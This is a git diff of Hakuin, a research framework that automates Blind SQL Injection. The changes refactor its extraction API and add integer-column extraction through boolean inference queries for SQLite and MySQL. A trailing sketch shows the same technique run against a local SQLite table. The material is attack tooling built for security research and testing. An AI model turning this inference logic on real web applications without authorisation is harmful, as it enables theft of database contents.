diff --git a/README.md b/README.md index 9f8d51f..545565d 100644 --- a/README.md +++ b/README.md @@ -2,13 +2,14 @@

-Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content. +Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content. -Hakuin been presented at academic and industrial conferences: -- [IEEE Workshop on Offsensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023 +Hakuin has been presented at esteemed academic and industrial conferences: +- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023 - [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023 +- [IEEE S&P Workshop on Offensive Technology (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023 -Also, make sure to read our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) or see the [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf). +More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf). 
## Installation @@ -48,9 +49,9 @@ class ContentRequester(Requester): return 'found' in r.content.decode() ``` -To start infering data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`. +To start extracting data, use the `Extractor` class. It requires a `DBMS` object to construct queries and a `Requester` object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`. -##### Example 1 - Inferring SQLite DBs +##### Example 1 - Extracting SQLite DBs ```python from hakuin.dbms import SQLite from hakuin import Extractor, Requester @@ -58,43 +59,43 @@ from hakuin import Extractor, Requester class StatusRequester(Requester): ... -exf = Extractor(requester=StatusRequester(), dbms=SQLite()) +ext = Extractor(requester=StatusRequester(), dbms=SQLite()) ``` -##### Example 2 - Inferring MySQL DBs +##### Example 2 - Extracting MySQL DBs ```python from hakuin.dbms import MySQL ... -exf = Extractor(requester=StatusRequester(), dbms=MySQL()) +ext = Extractor(requester=StatusRequester(), dbms=MySQL()) ``` -Now that eveything is set, you can start inferring DB schemas. +Now that everything is set, you can start extracting DB schemas. 
-##### Example 1 - Inferring DB Schemas +##### Example 1 - Extracting DB Schemas ```python # strategy: # 'binary': Use binary search # 'model': Use pre-trained models -schema = exf.extract_schema(strategy='model') +schema = ext.extract_schema(strategy='model') ``` -##### Example 2 - Inferring DB Schemas with Metadata +##### Example 2 - Extracting DB Schemas with Metadata ```python # metadata: # True: Detect column settings (data type, nullable, primary key) # False: Pass -schema = exf.extract_schema(strategy='model', metadata=True) +schema = ext.extract_schema(strategy='model', metadata=True) ``` -##### Example 3 - Inferring only Table/Column Names +##### Example 3 - Extracting only Table/Column Names ```python -tables = exf.extract_table_names(strategy='model') -columns = exf.extract_column_names(table='users', strategy='model') +tables = ext.extract_table_names(strategy='model') +columns = ext.extract_column_names(table='users', strategy='model') ``` Once you know the schema, you can extract the actual content. -##### Example 1 - Inferring Textual Columns +##### Example 1 - Extracting Textual Columns ```python # strategy: # 'binary': Use binary search @@ -102,7 +103,12 @@ Once you know the schema, you can extract the actual content. # 'unigram': Use unigram model # 'dynamic': Dynamically identify the best strategy. This setting # also enables opportunistic guessing. -res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'): +res = ext.extract_column_text(table='users', column='address', strategy='dynamic') +``` + +##### Example 2 - Extracting Integer Columns +```python +res = ext.extract_column_int(table='users', column='id') ``` More examples can be found in the `tests` directory. @@ -110,7 +116,7 @@ More examples can be found in the `tests` directory. ## For Researchers -This repository is maintained to fit the needs of security practitioners. 
Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. +This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. #### Cite Hakuin diff --git a/hakuin/Extractor.py b/hakuin/Extractor.py index 8f81a5a..df97a53 100644 --- a/hakuin/Extractor.py +++ b/hakuin/Extractor.py @@ -25,7 +25,7 @@ class Extractor: models with Huffman trees Returns: - list: List of extracted table names + list: list of extracted table names ''' allowed = ['binary', 'model'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -35,8 +35,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.TablesQueries.rows_count, + lower=0, upper=8, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -61,7 +63,7 @@ class Extractor: models with Huffman trees Returns: - list: List of extracted column names + list: list of extracted column names ''' allowed = ['binary', 'model'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -71,8 +73,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.ColumnsQueries.rows_count, + lower=0, upper=8, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -137,7 +141,7 @@ class Extractor: return schema - def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128): + def extract_column_text(self, table, column, 
strategy='dynamic', charset=None, n_rows_guess=128): '''Extracts text column. Params: @@ -152,7 +156,7 @@ class Extractor: n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set Returns: - list: List of strings in the column + list: list of strings in the column ''' allowed = ['binary', 'unigram', 'fivegram', 'dynamic'] assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' @@ -161,8 +165,10 @@ class Extractor: n_rows = search_alg.IntExponentialBinarySearch( requester=self.requester, query_cb=self.dbms.RowsQueries.rows_count, + lower=0, upper=n_rows_guess, - find_range=True, + find_lower=False, + find_upper=True, ).run(ctx) if strategy == 'binary': @@ -185,3 +191,30 @@ class Extractor: queries=self.dbms.RowsQueries, charset=charset, ).run(ctx, n_rows) + + + def extract_column_int(self, table, column, n_rows_guess=128): + '''Extracts integer column. + + Params: + table (str): table name + column (str): column name + n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set + + Returns: + list: list of integers in the column + ''' + ctx = search_alg.Context(table, column, None, None) + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.RowsQueries.rows_count, + lower=0, + upper=n_rows_guess, + find_lower=False, + find_upper=True, + ).run(ctx) + + return collect.IntCollector( + requester=self.requester, + queries=self.dbms.RowsQueries, + ).run(ctx, n_rows) diff --git a/hakuin/collectors.py b/hakuin/collectors.py index 6edb1cb..288a9be 100644 --- a/hakuin/collectors.py +++ b/hakuin/collectors.py @@ -60,6 +60,22 @@ class Collector(metaclass=ABCMeta): raise NotImplementedError() +class IntCollector(Collector): + '''Collector for integer columns.''' + def __init__(self, requester, queries): + super().__init__(requester, queries) + + + def collect_row(self, ctx): + return IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.queries.int, + lower=0, +
upper=128, + find_lower=True, + find_upper=True, + ).run(ctx) + class TextCollector(Collector): '''Collector for text columns.''' @@ -218,7 +234,8 @@ class BinaryTextCollector(TextCollector): query_cb=self.queries.char_unicode, lower=ASCII_MAX + 1, upper=UNICODE_MAX + 1, - find_range=False, + find_lower=False, + find_upper=False, correct=correct_ord, ) res = search_alg.run(ctx) diff --git a/hakuin/dbms/MySQL.py b/hakuin/dbms/MySQL.py index 012f975..0e0138c 100644 --- a/hakuin/dbms/MySQL.py +++ b/hakuin/dbms/MySQL.py @@ -293,6 +293,16 @@ class MySQLRowsQueries(UniformQueries): return self.normalize(query) + def int(self, ctx, n): + query = f''' + SELECT {MySQL.escape(ctx.column)} < {n} + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + class MySQL(DBMS): DATA_TYPES = [ diff --git a/hakuin/dbms/SQLite.py b/hakuin/dbms/SQLite.py index cb41a03..298dd83 100644 --- a/hakuin/dbms/SQLite.py +++ b/hakuin/dbms/SQLite.py @@ -278,6 +278,14 @@ class SQLiteRowsQueries(UniformQueries): return self.normalize(query) + def int(self, ctx, n): + query = f''' + SELECT {SQLite.escape(ctx.column)} < {n} + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) diff --git a/hakuin/search_algorithms.py b/hakuin/search_algorithms.py index 3a73fb9..732a0ba 100644 --- a/hakuin/search_algorithms.py +++ b/hakuin/search_algorithms.py @@ -44,7 +44,7 @@ class SearchAlgorithm(metaclass=ABCMeta): class IntExponentialBinarySearch(SearchAlgorithm): '''Exponential and binary search for integers.''' - def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None): + def __init__(self, requester, query_cb, lower=0, upper=16, find_lower=False, find_upper=True, correct=None): '''Constructor. 
Params: @@ -52,13 +52,15 @@ class IntExponentialBinarySearch(SearchAlgorithm): query_cb (function): query construction function lower (int): lower bound of search range upper (int): upper bound of search range - find_range (bool): exponentially expands range until the correct value is within + find_lower (bool): exponentially expands the lower bound until the correct value is within the range + find_upper (bool): exponentially expands the upper bound until the correct value is within the range correct (int|None): correct value. If provided, the search is emulated ''' super().__init__(requester, query_cb) self.lower = lower self.upper = upper - self.find_range = find_range + self.find_lower = find_lower + self.find_upper = find_upper self.correct = correct self.n_queries = 0 @@ -74,29 +76,42 @@ class IntExponentialBinarySearch(SearchAlgorithm): ''' self.n_queries = 0 - if self.find_range: - lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper) - else: - lower, upper = self.lower, self.upper + if self.find_lower: + self._find_lower(ctx, self.upper - self.lower) + if self.find_upper: + self._find_upper(ctx, self.upper - self.lower) - return self._search(ctx, lower, upper) + return self._search(ctx, self.lower, self.upper) - def _find_range(self, ctx, lower, upper): - '''Exponentially expands the search range until the correct value is within. + def _find_lower(self, ctx, step): + '''Exponentially expands the lower bound until the correct value is within the range. Params: ctx (Context): extraction context - lower (int): lower bound - upper (int): upper bound - - Returns: - int: correct upper bound + step (int): initial step ''' - if self._query(ctx, upper): - return lower, upper + if not self._query(ctx, self.lower): + return - return self._find_range(ctx, upper, upper * 2) + self.upper = self.lower + self.lower -= step + self._find_lower(ctx, step * 2) + + def _find_upper(self, ctx, step): + '''Exponentially expands the upper bound until the correct value is within the range.
+ + Params: + ctx (Context): extraction context + step (int): initial step + ''' + if self._query(ctx, self.upper): + return + + self.lower = self.upper + self.upper += step + self._find_upper(ctx, step * 2) def _search(self, ctx, lower, upper): diff --git a/logo.png b/logo.png index 3c1e6af..fc3c6db 100644 Binary files a/logo.png and b/logo.png differ diff --git a/tests/dbs/data_types.sqlite b/tests/dbs/data_types.sqlite new file mode 100644 index 0000000..0b27c4a Binary files /dev/null and b/tests/dbs/data_types.sqlite differ diff --git a/tests/test_data_types.py b/tests/test_data_types.py new file mode 100644 index 0000000..4cfe1c1 --- /dev/null +++ b/tests/test_data_types.py @@ -0,0 +1,28 @@ +import json +import logging + +import hakuin +from hakuin import Extractor +from hakuin.dbms import SQLite + +from OfflineRequester import OfflineRequester + + + +logging.basicConfig(level=logging.INFO) + + + +def main(): + requester = OfflineRequester(db='data_types', verbose=True) + ext = Extractor(requester=requester, dbms=SQLite()) + + # res = ext.extract_schema(strategy='binary') + # print(res) + + res = ext.extract_column_int('data_types', 'integer') + + + +if __name__ == '__main__': + main() diff --git a/tests/test_large_content.py b/tests/test_large_content.py index 677c5a7..7eae326 100644 --- a/tests/test_large_content.py +++ b/tests/test_large_content.py @@ -25,7 +25,7 @@ def main(): ext = Extractor(requester=requester, dbms=SQLite()) if len(sys.argv) == 3: - res = ext.extract_column(sys.argv[1], sys.argv[2]) + res = ext.extract_column_text(sys.argv[1], sys.argv[2]) print('Total requests:', requester.n_queries) print('Average RPC:', requester.n_queries / len(''.join(res))) else: @@ -43,7 +43,7 @@ def main(): # measure rpc for table, columns in rpc.items(): for column in columns: - res = ext.extract_column(table, column) + res = ext.extract_column_text(table, column) res_len = len(''.join(res)) col_rpc = requester.n_queries / len(''.join(res)) rpc[table][column] = 
(requester.n_queries, col_rpc) diff --git a/tests/test_large_schema.py b/tests/test_large_schema.py index 60bf245..ba41ea3 100644 --- a/tests/test_large_schema.py +++ b/tests/test_large_schema.py @@ -13,7 +13,7 @@ logging.basicConfig(level=logging.INFO) def main(): - requester = OfflineRequester(db='large_schema') + requester = OfflineRequester(db='large_schema', verbose=False) ext = Extractor(requester=requester, dbms=SQLite()) res = ext.extract_schema() diff --git a/tests/test_online.py b/tests/test_online.py index 20b44ff..fcd9cc1 100644 --- a/tests/test_online.py +++ b/tests/test_online.py @@ -47,7 +47,8 @@ def main(): res = ext.extract_schema(strategy='model', metadata=True) print(json.dumps(res, indent=4)) else: - res = ext.extract_column(table, column) + res = ext.extract_column_text(table, column) + # res = ext.extract_column_int(table, column) print(json.dumps(res, indent=4)) diff --git a/tests/test_unicode.py b/tests/test_unicode.py index 310856c..92cef07 100644 --- a/tests/test_unicode.py +++ b/tests/test_unicode.py @@ -20,7 +20,7 @@ def main(): res = ext.extract_schema(strategy='binary') print(res) - res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ') + res = ext.extract_column_text('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
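
For reference, here is a minimal standalone sketch of how the new `extract_column_int` path fits together: a per-row predicate shaped like the `int()` queries added for SQLite and MySQL (`SELECT col < n ... LIMIT 1 OFFSET row`), driven by the exponential bound expansion that `_find_lower` and `_find_upper` now perform. It is an illustration under stated assumptions, not Hakuin code: the oracle runs the query directly through Python's `sqlite3` instead of going through a `Requester`, the expansion is written as loops rather than recursion, the final step assumes `_search` (not shown in this diff) is a plain binary search over the half-open range `[lower, upper)`, and the names `make_oracle`, `exp_binary_search`, `demo_sqlite` and the `demo`/`val` table are hypothetical.

```python
import sqlite3


def make_oracle(conn, table, column, row):
    '''Returns query(n), which answers "is the value at `row` less than n?".

    Hypothetical helper shaped like the int() queries in the diff. The
    double-quote identifier quoting is an assumption; Hakuin uses its own
    SQLite.escape, which is not shown here.
    '''
    sql = f'SELECT "{column}" < ? FROM "{table}" LIMIT 1 OFFSET ?'

    def query(n):
        (res,) = conn.execute(sql, (n, row)).fetchone()
        return bool(res)

    return query


def exp_binary_search(query, lower=0, upper=128, find_lower=True, find_upper=True):
    '''Finds the integer v for which query(n) == (v < n).

    Hypothetical re-implementation of the find_lower/find_upper logic.
    Returns (value, number_of_queries).
    '''
    n_queries = 0

    def ask(n):
        nonlocal n_queries
        n_queries += 1
        return query(n)

    # Like _find_lower: while v < lower, slide the window down, doubling the step.
    step = upper - lower
    if find_lower:
        while ask(lower):
            upper, lower = lower, lower - step
            step *= 2

    # Like _find_upper: while v >= upper, slide the window up, doubling the step.
    step = upper - lower
    if find_upper:
        while not ask(upper):
            lower, upper = upper, upper + step
            step *= 2

    # Assumed _search: binary search keeping the invariant lower <= v < upper.
    while upper - lower > 1:
        mid = (lower + upper) // 2
        if ask(mid):
            upper = mid
        else:
            lower = mid
    return lower, n_queries


def demo_sqlite():
    '''Extracts every row of a hypothetical in-memory table, one row at a time.'''
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE demo (val INTEGER)')
    conn.executemany('INSERT INTO demo VALUES (?)', [(5,), (-300,), (1000,)])
    # Row count read directly here; Hakuin infers it with another search instead.
    (n_rows,) = conn.execute('SELECT COUNT(*) FROM demo').fetchone()
    return [
        exp_binary_search(make_oracle(conn, 'demo', 'val', row))[0]
        for row in range(n_rows)
    ]


if __name__ == '__main__':
    print(demo_sqlite())
```

The sketch mirrors the diff's split between callers: `IntCollector` searches row values with `find_lower=True`, which spends at least one extra request per row but lets negative values be recovered, while the row-count searches in `Extractor` keep `find_lower=False` because a count cannot be negative.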